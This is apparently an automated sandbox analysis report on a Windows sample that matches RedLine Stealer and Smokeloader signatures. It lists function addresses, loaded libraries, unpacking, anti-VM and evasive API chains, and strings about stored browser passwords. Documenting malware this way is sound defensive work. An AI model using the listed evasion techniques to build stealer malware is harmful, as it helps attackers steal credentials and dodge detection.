Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00430228	0_2_00430228
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004052D9	0_2_004052D9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00436ADC	0_2_00436ADC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00405AAA	0_2_00405AAA
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043B362	0_2_0043B362
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00402476	0_2_00402476
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042FD35	0_2_0042FD35
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042AD82	0_2_0042AD82
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042D658	0_2_0042D658
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00430E6C	0_2_00430E6C
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00438E28	0_2_00438E28
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0042CFBA	0_2_0042CFBA
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041204D	0_2_0041204D
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00441057	0_2_00441057
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00415070	0_2_00415070
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00448800	0_2_00448800
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043D8D0	0_2_0043D8D0
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041E083	0_2_0041E083
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0044915B	0_2_0044915B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0045D15A	0_2_0045D15A
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041316D	0_2_0041316D
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040112C	0_2_0040112C
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004279E0	0_2_004279E0
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041D1E9	0_2_0041D1E9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004109FC	0_2_004109FC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040D994	0_2_0040D994
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0044F244	0_2_0044F244
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041AA49	0_2_0041AA49
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041B251	0_2_0041B251
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00429A5B	0_2_00429A5B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00410218	0_2_00410218
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00410A33	0_2_00410A33
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00414A83	0_2_00414A83
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0044234A	0_2_0044234A
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0040136E	0_2_0040136E
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00457B30	0_2_00457B30
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00428334	0_2_00428334
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041EBEB	0_2_0041EBEB
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00415C7E	0_2_00415C7E
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00418413	0_2_00418413
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043A4FE	0_2_0043A4FE
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00424C8D	0_2_00424C8D
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043BCA4	0_2_0043BCA4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00416548	0_2_00416548
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00439535	0_2_00439535
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0041764A	0_2_0041764A
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0043D600	0_2_0043D600
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_004126B9	0_2_004126B9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00429730	0_2_00429730
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00434FAC	0_2_00434FAC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422BC2C	0_2_0422BC2C
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0420D43D	0_2_0420D43D
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04206C08	0_2_04206C08
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421FC0B	0_2_0421FC0B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04206472	0_2_04206472
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421047F	0_2_0421047F
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04227C47	0_2_04227C47
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421D450	0_2_0421D450
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0424F4AB	0_2_0424F4AB
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421ACB0	0_2_0421ACB0
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421B4B8	0_2_0421B4B8
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423048F	0_2_0423048F
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04229CC2	0_2_04229CC2
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422F4DF	0_2_0422F4DF
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04205D11	0_2_04205D11
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04205540	0_2_04205540
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04236D43	0_2_04236D43
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042425B1	0_2_042425B1
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422859B	0_2_0422859B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423B5C9	0_2_0423B5C9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422A5D4	0_2_0422A5D4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421867A	0_2_0421867A
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421EE52	0_2_0421EE52
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04215EE5	0_2_04215EE5
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04224EF4	0_2_04224EF4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042026DD	0_2_042026DD
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423BF0B	0_2_0423BF0B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423A765	0_2_0423A765
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042167AF	0_2_042167AF
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423979C	0_2_0423979C
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422AFE9	0_2_0422AFE9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042178B1	0_2_042178B1
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422D8BF	0_2_0422D8BF
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423908F	0_2_0423908F
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042310D3	0_2_042310D3
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04212920	0_2_04212920
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04229997	0_2_04229997
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422D221	0_2_0422D221
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04235213	0_2_04235213
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04248A67	0_2_04248A67
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042122B4	0_2_042122B4
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042412BE	0_2_042412BE
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042342E7	0_2_042342E7
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0421E2EA	0_2_0421E2EA
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042152D7	0_2_042152D7
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0423DB37	0_2_0423DB37
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0422C341	0_2_0422C341
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0420E3B5	0_2_0420E3B5
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0420AB8F	0_2_0420AB8F
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0420B390	0_2_0420B390
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042303F5	0_2_042303F5
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0420DBFB	0_2_0420DBFB
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0425D3C1	0_2_0425D3C1
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042493C2	0_2_042493C2
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042133D4	0_2_042133D4

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: String function: 00438E28 appears 39 times
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: String function: 0423D2D7 appears 48 times
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: String function: 0043D070 appears 51 times
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: String function: 0420A905 appears 38 times
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: String function: 0040E14E appears 52 times
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: String function: 0420E3B5 appears 36 times
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: String function: 004360E1 appears 144 times

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1720

Source: I5jG2Os8GA.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: I5jG2Os8GA.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@0/1

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_0277947E CreateToolhelp32Snapshot,Module32First,

0_2_0277947E

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7276

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\72706ed6-c709-4f73-b0d7-e0e3f2a15ee0

Jump to behavior

Source: I5jG2Os8GA.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: I5jG2Os8GA.exe, 00000000.00000002.3055237243.000000000444D000.00000004.00000020.00020000.00000000.sdmp, I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004EEE000.00000004.00000020.00020000.00000000.sdmp, I5jG2Os8GA.exe, 00000000.00000002.3055237243.000000000445B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: I5jG2Os8GA.exe

ReversingLabs: Detection: 89%

Source: unknown	Process created: C:\Users\user\Desktop\I5jG2Os8GA.exe "C:\Users\user\Desktop\I5jG2Os8GA.exe"
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1720

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: my-global-render.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: I5jG2Os8GA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: I5jG2Os8GA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: I5jG2Os8GA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: I5jG2Os8GA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: I5jG2Os8GA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: I5jG2Os8GA.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: I5jG2Os8GA.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\dat\yijole\segod\dile62\ru.pdb source: I5jG2Os8GA.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Unpacked PE file: 0.2.I5jG2Os8GA.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Unpacked PE file: 0.2.I5jG2Os8GA.exe.400000.0.unpack

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00464074 push B000468Ch; retn 0044h	0_2_00464079
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00463CAD push esi; ret	0_2_00463CB6
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h	0_2_00403D71
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00452768 push ecx; ret	0_2_0045277B
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04203FD3 push eax; mov dword ptr [esp], 00000000h	0_2_04203FD8
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_042529CF push ecx; ret	0_2_042529E2

Source: I5jG2Os8GA.exe

Static PE information: section name: .text entropy: 7.870139503393558

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00401FF9 Sleep,ExitProcess,	0_2_00401FF9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00401FF9 Sleep,ExitProcess,	0_2_00401FF9
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04202260 Sleep,ExitProcess,	0_2_04202260

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess

graph_0-70809

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep			graph_0-70680
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-70682

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_00429EF7 rdtsc

0_2_00429EF7

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,

0_2_0041F9A4

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-70902

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess			graph_0-70853
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess			graph_0-70859

Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00451F08 FindFirstFileExW,	0_2_00451F08
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00451FBC
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_0425216F FindFirstFileExW,	0_2_0425216F
Source: C:\Users\user\Desktop\I5jG2Os8GA.exe	Code function: 0_2_04252223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_04252223

Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: Amcache.hve.14.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: I5jG2Os8GA.exe, 00000000.00000003.1838596563.0000000004F48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
